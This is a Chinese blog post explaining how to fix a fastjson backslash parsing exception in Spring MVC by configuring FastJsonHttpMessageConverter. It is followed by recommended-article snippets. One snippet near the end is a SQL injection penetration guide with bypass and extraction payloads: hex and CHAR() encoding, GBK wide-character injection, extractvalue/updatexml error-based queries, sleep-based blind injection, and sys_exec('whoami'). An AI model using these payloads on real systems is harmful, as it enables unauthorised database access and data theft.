fastjosn处理‘\‘反斜杠报错问题的处理

最新推荐文章于 2024-07-18 18:11:28 发布
原创 最新推荐文章于 2024-07-18 18:11:28 发布 · 1.5k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#springmvc #fastjson

本文介绍在SpringMVC中使用FastJSON进行序列化时如何处理含有反斜杠等特殊字符的JSON字符串。通过配置SpringMVC的消息转换器解决异常问题。

Spring MVC 使用fastjson做序列化反序列化时处理带有反斜杠’'等特殊字符的处理

一次在Spring mvc中引入 fastjson作为JSON解析工具类的时候,在接收含有特殊字符的JSON串时遇到了如下异常

 com.zhht.pps.controller.TobPpsOrderController.add() 参数: {
  "k" : "b38c04e4-6776-460c-8ff2-1c50b3cf872b",
  "data" : "{\n  \"orderMoney\" : \"6\",\n  \"carId\" : \"5d012c0d_bf82_11e7_8e04_6c92bf31522f\",\n  \"items\" : \"[\\n  {\\n    \\\"buyDate\\\" : \\\"2017-11-29\\\",\\n    \\\"endTime\\\" : \\\"16:40\\\",\\n    \\\"beginTime\\\" : \\\"14:00\\\",\\n    \\\"price\\\" : \\\"3.00\\\",\\n    \\\"ppsType\\\" : \\\"0\\\"\\n  },\\n  {\\n    \\\"buyDate\\\" : \\\"2017-11-30\\\",\\n    \\\"endTime\\\" : \\\"16:40\\\",\\n    \\\"beginTime\\\" : \\\"14:00\\\",\\n    \\\"price\\\" : \\\"3.00\\\",\\n    \\\"ppsType\\\" : \\\"0\\\"\\n  }\\n]\",\n  \"plateNumber\" : \"京FHHYHHY\",\n  \"ppsType\" : \"0\",\n  \"parkId\" : \"5770a654_4fde_11e6_bd3c_2880239dce10\"\n}"
}
2017-11-27 17:22:27.146 [e8302f76-58c3-428e-a1a8-0a1f986f8548] [ERROR]  TobPpsOrderController {TobPpsOrderController.java:102} - syntax error, expect {, actual string, pos 0, fastjson-version 1.2.41
com.alibaba.fastjson.JSONException: syntax error, expect {, actual string, pos 0, fastjson-version 1.2.41
	at com.alibaba.fastjson.parser.deserializer.JavaBeanDeserializer.deserialze(JavaBeanDeserializer.java:451)
	at com.alibaba.fastjson.parser.deserializer.JavaBeanDeserializer.deserialze(JavaBeanDeserializer.java:271)
	at com.alibaba.fastjson.parser.deserializer.JavaBeanDeserializer.deserialze(JavaBeanDeserializer.java:267)
	at com.alibaba.fastjson.parser.DefaultJSONParser.parseObject(DefaultJSONParser.java:640)
	at com.alibaba.fastjson.JSON.parseObject(JSON.java:365)
	at com.alibaba.fastjson.JSON.parseObject(JSON.java:333)
	at com.alibaba.fastjson.JSON.parseObject(JSON.java:247)

搜索了很多帖子都是在JSON串上做文章,通过json.repalce()的方式来替换特殊字符以达到正确解析目的的,但是一旦类似地方太多,产生大量重复代码,于是采用了修改Spring mvc配置的方式解决
关键配置如下:

<mvc:annotation-driven>
		<mvc:message-converters>
			<bean class="org.springframework.http.converter.StringHttpMessageConverter">
				<constructor-arg value="UTF-8" />
			</bean>
			<bean
				class="com.alibaba.fastjson.support.spring.FastJsonHttpMessageConverter">
				<property name="supportedMediaTypes">
					<list>
						<value>application/json</value>
					</list>
				</property>
			</bean>
		</mvc:message-converters>
	</mvc:annotation-driven>

希望能够帮到遇到相同问题的朋友!

详解json串反转义(消除反斜杠).docx
01-22
详解json串反转义(消除反斜杠).docx
处理php自动反斜杠的函数代码
10-29
3. **全局变量处理**:分别对 `$_POST`、`$_GET` 和 `$_COOKIE` 这三个超全局变量中的数据进行处理,确保所有的输入数据都已去除了不必要的反斜杠。 #### 使用注意事项 - **兼容性**:需要注意的是,`get_magic_...
fastjson如何去掉多余的反斜杠
m0_37979201的博客
03-09 2万+
{"data":"{\"message\":\"\",\"result\":0,\"data\":{\"cardtype\":0,\"sealimgs\":[\"{\\\"id\\\":16,\\\"img\\\":\\\"H4znOvV8Cb101BRlW6WhIU8n8B6GEqjM44AAA=\
FastJson解析带反斜杠的json 出现的bug
qq_32051433的博客
12-08 987
今天在解析上传数据时,上传的数据是{“content”:“ss\*s”}, 然后后台返回的json是{“content”:“ss\\*s”},这种j值带有\\的json,使用fastjson直接把\\吞掉了,后面使用谷歌的Gson能完美解析出来ss\s,所以这是不是是属于fastjson的一个bug,有动的大佬希望可以提出指正
使用fastjson将数据转为json时,出现反斜杠导致json数据报错的解决
甜到你了么的博客
12-21 8929
错误报文如下 { "data":"{\"name\":\"张三\",\"result\":0,,\"sex\":\"男\",\"age\":\"18\"} } 错误原因 json对象嵌套json字符串 解决办法 1、接受到名为people的json对象 String jsonString = JSONObject.toJSONString(people); JSONObject jsonObject = JSONObject.parseObject(jsonString); 2、使用反转义方法 Str
使用fastJson解析json字符串时出现反斜杠问题解决
programmer_trip的博客
09-01 7077
使用fastJson导入的pom依赖 <dependency> <groupId>com.alibaba</groupId> <artifactId>fastjson</artifactId> <version>1.2.68</version> <scope>compile</scope>
fastjson 如何去掉反斜杠
wfanking的博客
09-28 1万+
FastJson是阿里的开源框架,被不少企业使用,是一个极其优秀的Json框架。 调用接口时候用的是FastJson,出现多余的反斜杠,情况如下 {&quot;data&quot;:&quot;{\&quot;message\&quot;:\&quot;\&quot;,\&quot;result\&quot;:0,\&quot;data\&quot;:{\&quot;id\&quot;:16,\&am
fastjson——如何处理反斜杠
热门推荐
Leesire的专栏
09-18 2万+
- fastjson 常用静态方法- [java] view plain copy  print? public static final Object parse(String text); // 把JSON文本parse为JSONObject或者JSONArray public static final JSONObject parseO
Nginx反斜杠自动解码问题解决方法
09-30
在Nginx服务器环境中,有时候会遇到一个特定的问题,即Nginx会自动对URL中的特殊字符进行解码,特别是反斜杠(/)字符。这可能会导致在某些情况下,如处理PATHINFO或搜索参数时,无法得到预期的结果。本文将深入探讨...
C#中去除字符串反斜杠的实用方法
07-06
处理文件路径时,.NET Framework的Path.Combine()方法可以用来连接路径,它会自动处理路径中的反斜杠,避免手动处理时可能出现的错误。此外,C#的string类还提供了其他方法,如Trim()、TrimStart()、TrimEnd()和...
PHP去掉json字符串中的反斜杠\及去掉双引号前的反斜杠
12-18
在PHP中,处理从AJAX传递的JSON字符串时,可能会遇到字符串中包含反斜杠的情况。这是因为JSON格式规定,特殊字符需要使用反斜杠进行转义。例如,双引号(")在JSON中需要写成\"。因此,当你收到这样的字符串时,需要...
python中的反斜杠问题深入讲解
09-18
### Python中的反斜杠问题深入讲解 #### 引言 Python是一种广泛使用的高级编程语言,以其简洁、清晰的语法著称。在Python中,反斜杠(`\`)被用作特殊字符的转义符。这有助于在字符串中插入一些特殊字符或控制序列...
【原创】FastJson:JSON接口调用后返回大量反斜杠(“/“) 之坑解决方案!牛逼!超神!
RubyXun's-Blog
07-27 3197
fastjson,json,序列化,反斜杠
fastJSON序列化对象成字符串后,存入redis有反斜杠问题解决过程。
weixin_42982636的博客
11-16 5771
如题: 序列化对象代码如下: AccountAdminEntity accountAdminEntity = getInfoById(DB3, ADMIN_KEY, getBaseMapper(), AccountAdminEntity.class, accountId); if (accountAdminEntity != null) { //写入redis try { String json = JSON.t
fastJSON 解决kafka消息斜杠转义问题
qq_46603351的博客
07-18 1262
kafka发送消息成功,但是消费者接收消息执行逻辑时因为转义字符导致的错误
fastJson字符串出现反斜杠问题解决
小科比的博客
10-22 5924
使用fastJson导入的pom依赖 <dependency> <groupId>com.alibaba</groupId> <artifactId>fastjson</artifactId> <version>1.2.68</version> <scope>compile</scope> </dependency> 代码展示: import com.al
C#中使用Json解析带有反斜杠\’的数据时会报错:Bad JSON escape sequence: \R. Path '[0].Detail', line 1, position 18.
youshuai001的博客
11-04 7646
在使用JsonConvert.DeserializeObject解析反斜杠\’的数据时会报错:Bad JSON escape sequence: \R. Path '[0].Detail', line 1, position 18,解决办法如下: string result = '[{ "Detail":"1<R1\\R2\\R3\\R4\\R5\\R6...
关于FastJson输出的json中的多余的反斜杠问题
weixin_34185320的博客
06-01 1万+
今天通过FastJson输出时,发现输出的内容中多了很多的反斜杠,导致前端的JS不能通过json来进行条件判断,从而影响了进程的正常运行。 运行环境:SpringBoot(1.5.21.RELEASE)+FastJson(1.2.47) 本来输出不应该有反斜杠的。 正确的输出应该是: 对比之后,发现就是在每个双引号的前面加了反斜杠表示转义。 Google和百度之后,大家的答案基本是可以三位...
代码7-1 过拟合及其抑制.ipynb
最新发布
12-06
代码7-1 过拟合及其抑制.ipynb
SELECT * FROM users WHERE username = \admin; 反斜杠 报错 如何 继续渗透
07-03
在MySQL中,直接使用反斜杠(`\`)绕过单引号(`'`)可能因数据库配置(如`NO_BACKSLASH_ESCAPES`模式)或语法错误而失败。若遇到报错(如语法错误或无结果),可尝试以下方法继续渗透: --- ### **1. 检查反斜杠是否被转义** MySQL默认启用反斜杠转义(`\`作为转义字符),但若配置了`NO_BACKSLASH_ESCAPES`模式,反斜杠会被视为普通字符。 **测试方法**: ```sql -- 尝试转义单引号(正常情况) SELECT * FROM users WHERE username = '\admin'; -- 可能报错或无结果 -- 测试反斜杠是否生效 SELECT '\admin'; -- 若返回字符串"admin",则反斜杠未被转义 ``` **若反斜杠无效**,需改用其他方法(如十六进制、`CHAR()`函数)。 --- ### **2. 尝试其他绕过技术** #### **(1) 十六进制编码** ```sql -- 直接替换字符串为十六进制 SELECT * FROM users WHERE username = 0x61646d696e; -- "admin" ``` #### **(2) 使用`CHAR()`函数** ```sql -- 动态生成字符串 SELECT * FROM users WHERE username = CHAR(97,100,109,105,110); -- "admin" ``` #### **(3) 宽字符注入(GBK编码)** 若目标使用GBK编码,可尝试注入`%df'`,使反斜杠与后续字符被解析为宽字符: ```sql -- 假设输入点为参数化查询 admin%df' -- 可能绕过单引号限制 ``` --- ### **3. 利用报错注入提取数据** 若查询报错且返回数据库信息,可通过报错注入(Error-Based Injection)泄露数据。 **示例**: ```sql -- 通过报错函数获取数据库版本 SELECT * FROM users WHERE username = admin' AND extractvalue(1, concat(0x3a, version())); -- 报错显示版本 -- 或使用updatexml SELECT * FROM users WHERE username = admin' AND updatexml(1, concat(0x3a, database()), 1); -- 报错显示当前数据库名 ``` --- ### **4. 布尔盲注或时间盲注** 若无直接报错信息,可通过布尔逻辑或延迟函数推断数据: #### **(1) 布尔盲注** ```sql -- 判断条件是否成立(通过页面响应差异) SELECT * FROM users WHERE username = 'admin' AND (substring(database(),1,1) = 'd'); ``` #### **(2) 时间盲注** ```sql -- 通过延迟函数判断条件 SELECT * FROM users WHERE username = 'admin' AND IF(ascii(substring(database(),1,1))=100, sleep(5), 0); ``` --- ### **5. 尝试其他分隔符或语法** - **双引号**:若MySQL配置允许(如`ANSI_QUOTES`未启用),可用双引号包裹字符串: ```sql SELECT * FROM users WHERE username = "admin"; ``` - **括号或注释符**:分割或注释掉单引号: ```sql SELECT * FROM users WHERE username = admi' || 'n; -- 假设||可拼接字符串 ``` --- ### **6. 检测并利用存储过程/函数** 若用户有执行权限,可尝试调用系统函数或自定义存储过程: ```sql -- 调用系统函数(如通过报错) SELECT * FROM users WHERE username = admin' AND sys_exec('whoami'); -- 需权限 ``` --- ### **防御与绕过建议** 1. **修复代码**:始终使用参数化查询,避免SQL拼接。 2. **过滤输入**:对特殊字符(如`\`、`'`、`"`)进行转义或拒绝。 3. **最小权限原则**:数据库用户仅授予必要权限。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值